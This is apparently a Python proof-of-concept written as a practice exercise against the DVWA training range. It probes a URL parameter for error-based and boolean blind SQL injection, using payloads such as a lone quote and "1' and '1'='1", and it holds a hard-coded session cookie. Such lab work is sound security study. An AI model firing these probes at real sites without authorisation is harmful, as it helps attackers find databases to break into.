使用Python进行的poc编写练习,针对dvwa靶场的sql注入,包括回显注入和盲注
import requests
import re
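def sql_inj(url2: list[str], headers: dict[str, str]) -> bool:
    """Probe the first query parameter for an error-based (echoed) SQL injection.

    Args:
        url2: the target URL split on ``=`` and ``&``: ``url2[0]`` is the
            scheme/host/path up to and including the first parameter name,
            ``url2[2]`` and ``url2[3]`` are the second parameter's name and
            value. ``url2[1]`` (the original first value) is replaced by the
            probe.
        headers: HTTP headers sent with the request; the DVWA session cookie
            is expected to be in here, otherwise the target redirects to login.

    Returns:
        True when the response body contains the MySQL error marker
        ``SQL syntax``, False otherwise. (The original always returned None;
        a boolean lets callers act on the result.)

    Raises:
        IndexError: if ``url2`` has fewer than four elements.
        requests.RequestException: on connection failure or timeout.
    """
    payload = "'"
    # Rebuild "name=probe&name2=value2"; the stray quote is what makes an
    # unescaped query fail, and DVWA at security=low echoes the DB error.
    probe_url = "{}={}&{}={}".format(url2[0], payload, url2[2], url2[3])
    # Bounded timeout: an unresponsive host must not hang the scan forever.
    response = requests.get(url=probe_url, headers=headers, timeout=10)
    # Use the decoded body; str(r.content) would search a "b'...'" repr,
    # which happens to match ASCII markers but is fragile for anything else.
    vulnerable = re.search('SQL syntax', response.text) is not None
    if vulnerable:
        print('存在sql回显注入漏洞')
    return vulnerable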
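def sqlblind_inj(url2: list[str], headers: dict[str, str]) -> bool:
    """Probe the first query parameter for a boolean-based blind SQL injection.

    Two requests are issued whose only difference is a tautology versus a
    contradiction appended to the value; the page is flagged when the
    tautology renders the record marker ``First name`` and the
    contradiction does not.

    Args:
        url2: the target URL split on ``=`` and ``&`` (same layout as in
            ``sql_inj``: ``url2[0]`` up to the first parameter name,
            ``url2[2]``/``url2[3]`` the second parameter's name/value).
        headers: HTTP headers sent with both requests, including the DVWA
            session cookie.

    Returns:
        True when the true/false responses differ as described, False
        otherwise. (The original always returned None.)

    Raises:
        IndexError: if ``url2`` has fewer than four elements.
        requests.RequestException: on connection failure or timeout.
    """
    payload_true = "1' and '1'='1"
    payload_false = "1' and '1'='2"
    url_true = "{}={}&{}={}".format(url2[0], payload_true, url2[2], url2[3])
    url_false = "{}={}&{}={}".format(url2[0], payload_false, url2[2], url2[3])
    # Bounded timeouts so a silent host cannot stall the scan indefinitely.
    body_true = requests.get(url=url_true, headers=headers, timeout=10).text
    body_false = requests.get(url=url_false, headers=headers, timeout=10).text
    marker = re.compile("First name")
    # Detection signal: the record only appears when the injected condition
    # is true. Both bodies empty (e.g. expired session -> login redirect)
    # correctly yields False rather than a false positive.
    vulnerable = bool(marker.search(body_true)) and not marker.search(body_false)
    if vulnerable:
        print('存在sql盲注漏洞')
    return vulnerable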
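if __name__ == '__main__':
    url = input('请输入测试URL:')
    # Split "http://host/path?id=1&Submit=Submit" into
    # ["http://host/path?id", "1", "Submit", "Submit"]; the probes index
    # elements 0, 2 and 3, so validate the shape here instead of letting
    # them fail with an opaque IndexError.
    url2 = re.split('=|&', url)
    if len(url2) < 4:
        raise SystemExit('URL must contain two name=value query parameters')
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'Accept-Encoding': 'gzip, deflate',
        # NOTE(review): the session id below is a credential committed to
        # source; PHPSESSID expires and belongs to whoever logged in, so an
        # expired or foreign value silently turns every probe into a login
        # redirect (both checks then report nothing). Supply it at run time
        # rather than hard-coding it.
        'Cookie': 'security=low; PHPSESSID=2c1f805aaa4d3cf042c42e70a1043003'
    }
    sql_inj(url2, headers)
    sqlblind_inj(url2, headers)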